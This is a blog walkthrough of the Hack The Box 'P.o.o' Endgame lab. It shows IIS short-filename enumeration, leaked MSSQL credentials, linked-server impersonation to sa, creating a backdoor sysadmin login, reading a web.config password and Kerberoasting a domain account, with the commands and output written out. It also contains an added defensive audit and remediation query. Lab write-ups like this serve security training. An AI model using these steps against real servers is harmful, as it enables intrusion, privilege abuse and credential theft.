毅种循环

HackTheBox-Endgame-P.o.o

Professional Offensive Operations#

by eksmrb3n
Professional Offensive Operations is a rising name in the cybersecurity field.
Recently they have been busy migrating their core services and components to a state-of-the-art cluster that offers cutting-edge software and hardware.
POO is designed to test your enumeration, lateral movement and privilege escalation skills in a small Active Directory environment configured with the latest operating systems and technologies.
The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain, collecting several flags along the way.
Entry point: 10.13.38.11

Recon#

Information gathering#

An nmap scan turned up ports 80 and 1433, so the target is presumably IIS-based and runs a SQL Server 2017 database.

Directory scan of the site with dirsearch.
I also noticed that the admin directory returns a 401, so authentication is in place.

I tried a few weak passwords without success.
That leaves only the .DS_Store file to look at.

.DS_Store exploitation#

Li Jiejie previously wrote a .DS_Store extraction tool. In real engagements I rarely pay attention to this file, but on a lab box no usable surface should be skipped, so let's give it a try.
I recommend this project: https://github.com/0xHJK/dumpall

[404] http://10.13.38.11/web.config web.config
[401] http://10.13.38.11/admin admin
[200] http://10.13.38.11/iisstart.htm iisstart.htm
[403] http://10.13.38.11/Templates Templates
[403] http://10.13.38.11/Themes Themes
[403] http://10.13.38.11/Images Images
[403] http://10.13.38.11/META-INF META-INF
[403] http://10.13.38.11/Uploads Uploads
[403] http://10.13.38.11/Plugins Plugins
[403] http://10.13.38.11/JS JS
[403] http://10.13.38.11/Widgets Widgets
[403] http://10.13.38.11/New folder New folder
[403] http://10.13.38.11/dev dev
[403] http://10.13.38.11/New folder (2) New folder (2)
[403] http://10.13.38.11/Themes/default Themes/default
[403] http://10.13.38.11/Images/icons Images/icons
[403] http://10.13.38.11/Images/buttons Images/buttons
[403] http://10.13.38.11/Widgets/Menu Widgets/Menu
[403] http://10.13.38.11/JS/custom JS/custom
[403] http://10.13.38.11/Widgets/Framework Widgets/Framework
[403] http://10.13.38.11/Widgets/Notifications Widgets/Notifications
[403] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1 dev/304c0c90fbc6520610abbf378e2339d1                                                      
[403] http://10.13.38.11/Widgets/CalendarEvents Widgets/CalendarEvents
[403] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc dev/dca66d38fd916317687e1390a420c3fc                                                      
[403] http://10.13.38.11/Widgets/Framework/Layouts Widgets/Framework/Layouts
[403] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db dev/304c0c90fbc6520610abbf378e2339d1/db                                                
[403] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/include dev/304c0c90fbc6520610abbf378e2339d1/include                                      
[403] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/core dev/304c0c90fbc6520610abbf378e2339d1/core                                            
[403] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/include dev/dca66d38fd916317687e1390a420c3fc/include                                      
[403] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db dev/dca66d38fd916317687e1390a420c3fc/db                                                
[403] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/src dev/304c0c90fbc6520610abbf378e2339d1/src                                              
[403] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/core dev/dca66d38fd916317687e1390a420c3fc/core                                            
[403] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/src dev/dca66d38fd916317687e1390a420c3fc/src                                              
[403] http://10.13.38.11/Widgets/Framework/Layouts/custom Widgets/Framework/Layouts/custom                                                              
[403] http://10.13.38.11/Widgets/Framework/Layouts/default Widgets/Framework/Layouts/default                                                            
[200] http://10.13.38.11/Images/iisstart.png Images/iisstart.png

But the resources it resolved to all come back 401, which does not help the current situation at all.

IIS short filename enumeration#

With nothing else to try I went back to port 80 and looked up known IIS issues; the IIS short-filename (8.3) disclosure from the article below turned out to apply when I ran the scanner.
See: https://www.freebuf.com/vuls/304741.html

└─# python3 iis_shortname_scan.py http://10.13.38.11/
Server is vulnerable, please wait, scanning...
[+] /d~1.*      [scan in progress]
[+] /n~1.*      [scan in progress]
[+] /t~1.*      [scan in progress]
[+] /w~1.*      [scan in progress]
[+] /ds~1.*     [scan in progress]
[+] /ne~1.*     [scan in progress]
[+] /te~1.*     [scan in progress]
[+] /tr~1.*     [scan in progress]
[+] /we~1.*     [scan in progress]
[+] /ds_~1.*    [scan in progress]
[+] /new~1.*    [scan in progress]
[+] /tem~1.*    [scan in progress]
[+] /tra~1.*    [scan in progress]
[+] /web~1.*    [scan in progress]
[+] /ds_s~1.*   [scan in progress]
[+] /newf~1.*   [scan in progress]
[+] /temp~1.*   [scan in progress]
[+] /tras~1.*   [scan in progress]
[+] /ds_st~1.*  [scan in progress]
[+] /newfo~1.*  [scan in progress]
[+] /templ~1.*  [scan in progress]
[+] /trash~1.*  [scan in progress]
[+] /ds_sto~1.* [scan in progress]
[+] /newfol~1.* [scan in progress]
[+] /templa~1.* [scan in progress]
[+] /trashe~1.* [scan in progress]
[+] /ds_sto~1   [scan in progress]
[+] Directory /ds_sto~1 [Done]
[+] /newfol~1   [scan in progress]
[+] Directory /newfol~1 [Done]
[+] /templa~1   [scan in progress]
[+] Directory /templa~1 [Done]
[+] /trashe~1   [scan in progress]
[+] Directory /trashe~1 [Done]
----------------------------------------------------------------
Dir:  /ds_sto~1
Dir:  /newfol~1
Dir:  /templa~1
Dir:  /trashe~1
----------------------------------------------------------------
4 Directories, 0 Files found in total
Note that * is a wildcard, matches any character zero or more times.

The first scan did not reveal much, so I scanned the directory that appeared most often, /dev/304c0c90fbc6520610abbf378e2339d1/.
That scan only showed the short-filename issue for the ds directory under it; after scanning each subdirectory in turn I found that db is affected as well.

└─# python3 iis_shortname_scan.py http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db  
Server is vulnerable, please wait, scanning...
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/p~1.*      [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/po~1.*     [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo~1.*    [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_~1.*   [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_c~1.*  [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.t*        [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.tx*       [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt*      [scan in progress]
[+] File /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt*
----------------------------------------------------------------

Now it is clear: this txt file has a name starting with poo_co, so all that is left is to brute-force that last part of the file name.

wfuzz#

wfuzz is a web fuzzer shipped with Kali, used here to enumerate further files and directories.

─# wfuzz -z file,/usr/share/wordlists/dirb/big.txt --sc 200 -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt
Total requests: 20469
=====================================================================
ID           Response   Lines    Word       Chars       Payload   
=====================================================================
000005138:   200        6 L      7 W        142 Ch      "connection"

That yields a file name: connection.
http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt

Recon PWN#

SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r
Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}

That gives us a flag and an account password.
#p00Public3xt3rnalUs3r

Deploy#

MSSQL#

Log in to the MSSQL server on port 1433 with the credentials obtained earlier.

Check current privileges#

SQL> SELECT is_srvrolemember('sysadmin');         
-----------   
     0

Check how many logins exist#

SQL> SELECT name FROM master..syslogins
name  
-------------------
sa   
external_user

Check which login has sysadmin#

SQL> SELECT name FROM master..syslogins WHERE sysadmin = '1';
name
---------------------------------------   
sa

Oddly, neither MDAT nor MUDT could obtain elevated privileges; then I happened to see an article.
https://www.freebuf.com/articles/system/267618.html
https://xz.aliyun.com/t/7534


The prerequisite is that external scripts must be enabled, and my user turned out not to have permission for that.
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 105: User does not have permission to perform this action.

MSSQL linked-server privilege escalation#

While I was at a loss I found this article:
https://www.sec-in.com/article/1270
After reading it and applying the method it describes, I obtained another linked server.

Existing links can be viewed in SSMS under "Server Objects -> Linked Servers". Alternatively, they can be listed with the "sp_linkedservers" stored procedure or by issuing the query "select * from master..sysservers". Selecting directly from the "sysservers" table is the preferred method because it discloses more information about the links.

SQL Server has a database link feature. Databases joined by a link can execute SQL on each other; this is perfectly normal functionality, but a misconfiguration lets us obtain privileges.
So: select * from master..sysservers
We get two servers.
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC

The author published three articles on this; https://www.netspi.com/blog/technical/network-penetration-testing/how-to-hack-database-links-in-sql-server/ is the earliest one I found covering it. I did not understand it, but I was deeply impressed.
If a link is enabled (data access set to 1), every user on the database server can use that link regardless of the user's own privileges (public or sysadmin, it does not matter).
If the link is configured to use a SQL account, every connection to the destination database carries that account's privileges on the destination. In other words, a public user on server A may be able to execute SQL queries on server B as sysadmin.
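As an added audit query (not part of the original writeup), the following T-SQL lists every linked server on an instance together with the login mapping used for it, so the combination exploited above stands out: ad-hoc queries allowed through the link plus a catch-all mapping to a fixed remote login, which hands every local login that remote account's privileges. The server names in the remediation statements are the two from this lab; the assessment labels, the `link_reader` login and its placeholder password are my own assumptions.

```sql
-- Linked-server trust audit (added example, not the writeup's own queries).
-- Run on each instance; here that would be COMPATIBILITY\POO_PUBLIC and COMPATIBILITY\POO_CONFIG.
SELECT
    s.name                          AS linked_server,
    s.data_source,
    s.is_data_access_enabled,       -- 1: OPENQUERY / four-part names work through the link
    s.is_rpc_out_enabled,           -- 1: EXECUTE (...) AT [link] works, the form used in this writeup
    -- sys.linked_logins holds one row per mapped local login; the default row has
    -- no matching server principal and applies to every login not listed explicitly
    COALESCE(p.name, '<all other logins>') AS local_login,
    l.uses_self_credential,         -- 1: the caller's own credentials are forwarded
    l.remote_name,                  -- fixed remote SQL login the caller becomes on the far side
    CASE
        WHEN s.is_data_access_enabled = 0 AND s.is_rpc_out_enabled = 0
            THEN 'ok: no ad-hoc queries possible through this link'
        WHEN p.name IS NULL AND l.uses_self_credential = 0 AND l.remote_name IS NOT NULL
            THEN 'RISK: every local login reaches ' + s.name + ' as ' + l.remote_name
        WHEN l.uses_self_credential = 0 AND l.remote_name IS NOT NULL
            THEN 'review: ' + p.name + ' reaches ' + s.name + ' as ' + l.remote_name
        ELSE 'ok: callers authenticate to the remote side with their own credentials'
    END                             AS assessment
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS l ON l.server_id    = s.server_id
LEFT JOIN sys.server_principals AS p ON p.principal_id = l.local_principal_id
WHERE s.is_linked = 1               -- skip the instance's own entry (server_id 0)
ORDER BY s.name, local_login;

-- Remediation on COMPATIBILITY\POO_CONFIG, whose link back to POO_PUBLIC is mapped to sa.
-- Either close the link to ad-hoc use entirely ...
EXEC sp_serveroption @server = N'COMPATIBILITY\POO_PUBLIC', @optname = 'data access', @optvalue = 'false';
EXEC sp_serveroption @server = N'COMPATIBILITY\POO_PUBLIC', @optname = 'rpc out',     @optvalue = 'false';
-- ... or drop the catch-all mapping (NULL = default mapping) so unmapped logins get nothing.
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'COMPATIBILITY\POO_PUBLIC', @locallogin = NULL;
-- If the link is genuinely needed, re-map it to a least-privilege login instead of sa
-- (link_reader is an assumed account; the password is a placeholder).
EXEC sp_addlinkedsrvlogin @rmtsrvname = N'COMPATIBILITY\POO_PUBLIC', @useself = 'false',
     @locallogin = NULL, @rmtuser = N'link_reader', @rmtpassword = N'<placeholder>';
```

The same audit on COMPATIBILITY\POO_PUBLIC shows the forward link to POO_CONFIG mapped to internal_user, which is the first hop of the loop used above.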

Check the current host#

SQL> select @@servername
--------------------------   
COMPATIBILITY\POO_PUBLIC

Check for linked hosts#

SQL> select srvname from sysservers;
srvname
------------------------------   
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC

We are linked to another host, COMPATIBILITY\POO_CONFIG.

Check the current user on COMPATIBILITY\POO_CONFIG#

SQL> EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
------------------------------   
internal_user

Likewise, check which login has sysadmin on COMPATIBILITY\POO_CONFIG#

SQL> EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
name                                                                         
----------------
sa   

Still sa.

Identity theft#

Next we have COMPATIBILITY\POO_CONFIG send a request back to COMPATIBILITY\POO_PUBLIC.

SQL> EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
------------------------------   
sa

Our privileges have become those of the sa login.
Query the current permissions:

SQL> EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
entity_name                       permission_name
------------------------------   ------------------------------   
server                           CONNECT SQL       
server                           SHUTDOWN
server                           CREATE ENDPOINT     
server                           CREATE ANY DATABASE  
server                           CREATE AVAILABILITY GROUP    
server                           ALTER ANY LOGIN         
server                           ALTER ANY CREDENTIAL                         
server                           ALTER ANY ENDPOINT                           
server                           ALTER ANY LINKED SERVER                     
server                           ALTER ANY CONNECTION                         
server                           ALTER ANY DATABASE                           
server                           ALTER RESOURCES
server                           ALTER SETTINGS   
server                           ALTER TRACE                                 
server                           ALTER ANY AVAILABILITY GROUP                 
server                           ADMINISTER BULK OPERATIONS                   
server                           AUTHENTICATE SERVER                         
server                           EXTERNAL ACCESS ASSEMBLY                     
server                           VIEW ANY DATABASE  
server                           VIEW ANY DEFINITION   
server                           VIEW SERVER STATE                           
server                           CREATE DDL EVENT NOTIFICATION               
server                           CREATE TRACE EVENT NOTIFICATION             
server                           ALTER ANY EVENT NOTIFICATION                 
server                           ALTER SERVER STATE                           
server                           UNSAFE ASSEMBLY                             
server                           ALTER ANY SERVER AUDIT                       
server                           CREATE SERVER ROLE                           
server                           ALTER ANY SERVER ROLE                       
server                           ALTER ANY EVENT SESSION
server                           CONNECT ANY DATABASE
server                           IMPERSONATE ANY LOGIN
server                           SELECT ALL USER SECURABLES
server                           CONTROL SERVER


We now have the highest privileges; for convenience I chose to add a user.

Add an SA user#

EXECUTE('EXECUTE(''CREATE LOGIN admin1 WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
-- create the login
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''admin1'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
-- add it to the sysadmin role

PWN#

python3 mssqlclient.py 'admin1:qwe123QWE!@#@10.13.38.11'
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
# list databases
SQL> SELECT name FROM master..sysdatabases;
name
------------------------------   
master
tempdb
model
msdb
POO_PUBLIC
flag
# look at the flag database
SQL> select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;
table_name                       table_schema   
------------------------------   ------------------------------   
flag                             dbo
# query the flag table
SQL> select * from flag.dbo.flag;
flag                                   
----------------------------------------   
b'POO{88d829eb39f2d11697e689d779810d42}'

Ghost#

MSSQL post-exploitation#

Using the account added earlier, log in with MUDT to continue.

Collect ipconfig output#

Windows IP Configuration
Ethernet adapter Ethernet1:
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.20.128.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::13c
   IPv6 Address. . . . . . . . . . . : dead:beef::1001
   IPv6 Address. . . . . . . . . . . : dead:beef::b9f9:e455:ae47:7753
   Link-local IPv6 Address . . . . . : fe80::b9f9:e455:ae47:7753%5
   IPv4 Address. . . . . . . . . . . : 10.13.38.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:feb9:1f8d%5
                                       10.13.38.2

Collect system information#

Host Name:                 COMPATIBILITY
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00520-27817-AA781
Original Install Date:     12/12/2019, 6:07:48 PM
System Boot Time:          11/28/2022, 10:58:37 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              4 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     16,383 MB
Available Physical Memory: 13,957 MB
Virtual Memory: Max Size:  18,815 MB
Virtual Memory: Available: 16,206 MB
Virtual Memory: In Use:    2,609 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    intranet.poo
Logon Server:              N/A
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB4533013
                           [02]: KB4516115
                           [03]: KB4523204
                           [04]: KB4530715
Network Card(s):           2 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.13.38.11
                                 [02]: fe80::b9f9:e455:ae47:7753
                                 [03]: dead:beef::b9f9:e455:ae47:7753
                                 [04]: dead:beef::1001
                                 [05]: dead:beef::13c
                           [02]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet1
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 172.20.128.101
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Collect process information#

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0        144 K
Registry                       104                            0     80,408 K
smss.exe                       308                            0      1,192 K
csrss.exe                      416                            0      6,400 K
wininit.exe                    492                            0      6,880 K
csrss.exe                      500                            1      4,800 K
winlogon.exe                   564                            1     18,580 K
services.exe                   636                            0     14,512 K
lsass.exe                      644                            0     22,708 K
svchost.exe                    784                            0      3,896 K
svchost.exe                    804                            0     16,392 K
fontdrvhost.exe                832                            0      3,780 K
fontdrvhost.exe                836                            1      4,300 K
svchost.exe                    928                            0     11,380 K
svchost.exe                    976                            0      7,328 K
svchost.exe                    288                            0     11,504 K
dwm.exe                        408                            1     49,304 K
svchost.exe                    488                            0      7,812 K
svchost.exe                    484                            0      7,892 K
svchost.exe                    340                            0      6,920 K
svchost.exe                    920                            0      8,456 K
svchost.exe                   1048                            0      6,056 K
svchost.exe                   1088                            0      8,052 K
svchost.exe                   1132                            0     16,184 K
svchost.exe                   1164                            0      9,724 K
svchost.exe                   1292                            0     13,244 K
svchost.exe                   1328                            0      5,760 K
svchost.exe                   1368                            0     11,964 K
svchost.exe                   1384                            0     23,504 K
svchost.exe                   1536                            0      9,032 K
svchost.exe                   1548                            0     12,340 K
svchost.exe                   1572                            0      9,228 K
svchost.exe                   1580                            0      5,684 K
svchost.exe                   1608                            0     15,744 K
svchost.exe                   1708                            0      5,824 K
svchost.exe                   1820                            0      9,072 K
svchost.exe                   1940                            0      8,348 K
svchost.exe                   2020                            0      7,784 K
svchost.exe                   1336                            0      6,688 K
svchost.exe                   2076                            0     23,268 K
svchost.exe                   2144                            0      9,688 K
svchost.exe                   2216                            0      7,200 K
svchost.exe                   2224                            0     12,812 K
svchost.exe                   2420                            0      9,708 K
spoolsv.exe                   2464                            0     16,436 K
svchost.exe                   2596                            0     10,868 K
svchost.exe                   2612                            0     12,584 K
svchost.exe                   2624                            0     86,144 K
svchost.exe                   2632                            0      7,920 K
svchost.exe                   2676                            0      8,532 K
msdtc.exe                     2692                            0     10,312 K
svchost.exe                   2748                            0      6,596 K
sqlbrowser.exe                2784                            0      4,588 K
sqlwriter.exe                 2848                            0      7,924 K
svchost.exe                   2856                            0      6,320 K
svchost.exe                   2864                            0      8,612 K
svchost.exe                   2876                            0      5,576 K
VGAuthService.exe             2884                            0     13,112 K
vmtoolsd.exe                  2896                            0     28,484 K
ManagementAgentHost.exe       2936                            0     11,980 K
svchost.exe                   2952                            0     11,876 K
MsMpEng.exe                   3008                            0    221,180 K
svchost.exe                   2056                            0     14,436 K
svchost.exe                   2408                            0     12,864 K
svchost.exe                   3236                            0     12,640 K
WmiPrvSE.exe                  3752                            0     21,060 K
svchost.exe                   3904                            0      7,756 K
dllhost.exe                   3912                            0     13,716 K
NisSrv.exe                    4424                            0      9,920 K
sqlservr.exe                  4692                            0    398,724 K
sqlceip.exe                   4708                            0     56,476 K
sqlservr.exe                  4716                            0    565,080 K
sqlceip.exe                   4724                            0     56,596 K
Launchpad.exe                 5316                            0     26,116 K
SearchIndexer.exe             5500                            0     24,672 K
svchost.exe                   5800                            0     10,120 K
LogonUI.exe                   5860                            1     50,288 K
svchost.exe                   5200                            0     25,788 K
svchost.exe                   2488                            0     12,544 K
svchost.exe                   4884                            0     22,392 K
svchost.exe                   4280                            0     17,248 K
svchost.exe                   4172                            0      5,960 K
svchost.exe                   5748                            0      8,964 K
svchost.exe                   1232                            0     10,192 K
WmiApSrv.exe                  3820                            0      6,720 K
SecurityHealthService.exe     1204                            0     10,988 K
GoogleUpdate.exe              6760                            0      3,472 K
wermgr.exe                    1172                            0     11,172 K
svchost.exe                    780                            0     13,076 K
svchost.exe                   1420                            0      6,304 K
TrustedInstaller.exe          2160                            0      7,080 K
TiWorker.exe                  6344                            0      9,524 K
cmd.exe                       5268                            0      3,688 K
conhost.exe                    116                            0     10,968 K
tasklist.exe                  1544                            0      7,712 K

Printer privilege escalation#

Since this is a Server 2019 machine, I went straight for the printer privilege escalation.

With IIS-level access, the next step is to read the site's config file; digging through files is essential on IIS.
I stumbled here and was being dumb at first: reading the file gave no response.
Later, after a reminder from 一号噩梦, I understood that commands like dir and type have to be run through cmd /c.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <staticContent>
            <mimeMap
                fileExtension=".DS_Store"
                mimeType="application/octet-stream"
            />
        </staticContent>
        <!--
        <authentication mode="Forms">
            <forms name="login" loginUrl="/admin">
                <credentials passwordFormat = "Clear">
                    <user 
                        name="Administrator" 
                        password="EverybodyWantsToWorkAtP.O.O."
                    />
                </credentials>
            </forms>
        </authentication>
        -->
    </system.webServer>
</configuration>

And so we have the third set of credentials.

Foothold#

Next I found another flag.txt on the Administrator's desktop.

POO{ff87c4fe10e2ef096f9a96a01c646f8f}
This one was relatively easy.

ROOT#

Query domain users#

net user /domain

The request will be processed at a domain controller for domain intranet.poo.
User accounts for \\DC.intranet.poo
-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                  
krbtgt                   mr3ks                    p00_adm                
p00_dev                  p00_hr                 
The command completed with one or more errors.

Query the domain administrators on this host#

net localgroup administrators /domain

The request will be processed at a domain controller for domain intranet.poo.
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.


I was stuck here for a long time; no matter what I tried, I could not dump any credentials.

SPN services#

Query the SPNs

Checking domain DC=intranet,DC=poo
CN=DC,OU=Domain Controllers,DC=intranet,DC=poo
 TERMSRV/DC
 TERMSRV/DC.intranet.poo
 Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC.intranet.poo
 ldap/DC.intranet.poo/ForestDnsZones.intranet.poo
 ldap/DC.intranet.poo/DomainDnsZones.intranet.poo
 DNS/DC.intranet.poo
 GC/DC.intranet.poo/intranet.poo
 RestrictedKrbHost/DC.intranet.poo
 RestrictedKrbHost/DC
 RPC/43b68534-ef5d-4165-b582-b9381481315e._msdcs.intranet.poo
 HOST/DC/POO
 HOST/DC.intranet.poo/POO
 HOST/DC
 HOST/DC.intranet.poo
 HOST/DC.intranet.poo/intranet.poo
 E3514235-4B06-11D1-AB04-00C04FC2DCD2/43b68534-ef5d-4165-b582-b9381481315e/intranet.poo
 ldap/DC/POO
 ldap/43b68534-ef5d-4165-b582-b9381481315e._msdcs.intranet.poo
 ldap/DC.intranet.poo/POO
 ldap/DC
 ldap/DC.intranet.poo
 ldap/DC.intranet.poo/intranet.poo
CN=krbtgt,CN=Users,DC=intranet,DC=poo
 kadmin/changepw
CN=COMPATIBILITY,OU=Servers,DC=intranet,DC=poo
 WSMAN/COMPATIBILITY
 WSMAN/COMPATIBILITY.intranet.poo
 TERMSRV/COMPATIBILITY
 TERMSRV/COMPATIBILITY.intranet.poo
 RestrictedKrbHost/COMPATIBILITY
 HOST/COMPATIBILITY
 RestrictedKrbHost/COMPATIBILITY.intranet.poo
 HOST/COMPATIBILITY.intranet.poo
CN=p00_hr,CN=Users,DC=intranet,DC=poo
 HR_peoplesoft/intranet.poo:1433
CN=p00_adm,CN=Users,DC=intranet,DC=poo
 cyber_audit/intranet.poo:443
Existing SPN found

powershell -c import-module c:\tmp\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat


Exception calling "GetNames" with "1" argument(s): "Value cannot be null.
Parameter name: enumType"
At C:\tmp\invoke-kerberoast.ps1:869 char:9
+         $UACValueNames = [Enum]::GetNames($UACEnum)
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentNullException
 
New-DynamicParameter : The term 'New-DynamicParameter' is not recognized as the name of a cmdlet, function, script 
file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct 
and try again.
At C:\tmp\invoke-kerberoast.ps1:873 char:9
+         New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNa ...
+         ~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (New-DynamicParameter:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
 
New-DynamicParameter : The term 'New-DynamicParameter' is not recognized as the name of a cmdlet, function, script 
file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct 
and try again.
At C:\tmp\invoke-kerberoast.ps1:894 char:13
+             New-DynamicParameter -CreateVariables -BoundParameters $P ...
+             ~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (New-DynamicParameter:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
 
TicketByteHexStream  : 
SamAccountName       : p00_hr
DistinguishedName    : CN=p00_hr,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433
TicketByteHexStream  : 
Hash                 : $krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$3EB841F0EF3ED736B7B4109888E0C523
                       $88CFB8F25C53E1CE383D0F26542BAF3C899C9178A3C20A00934E9FE5F96D2C52B375DA51D714E533FA84EC033A8AA17
                       FBD6F3B4577702A6E60F08092EB9E1E6816A21DE22E85048608313FB7D717BA3E7065815C415B52A09E54D245B621C9B
                       0EAD4CA06FC9D226B3D1451572BBBAD5B17DDFB747C294C87DBFBA211FCB26A33151519A27BFAA9F96F4176F0C681FCF
                       7F080FA6CE3203059EC14A9CD9D242F8730F090D1FC031F00F2DECEA34AC76133AE8B336054D1DE48B2524227F34C6BE
                       6D4E8E64AFEFD6FBE0D2F7E5FCB540EBD03D238E63B88F0874F947D779B53CD5AAEC71368F3D7F123E919A4E9B72A220
                       D5143215D92F435846BF0DBD5327054769FC9FE1C8112A906646AC4C69816A663CF99E8B54A879C62D4295DC9D4AAF70
                       C778D298D0C59E015AD8C7D664F84A150C96D61DC29C9A07A01B9B7EB87254AE681651FACA6F3CDE7E8F6AD0F07F187F
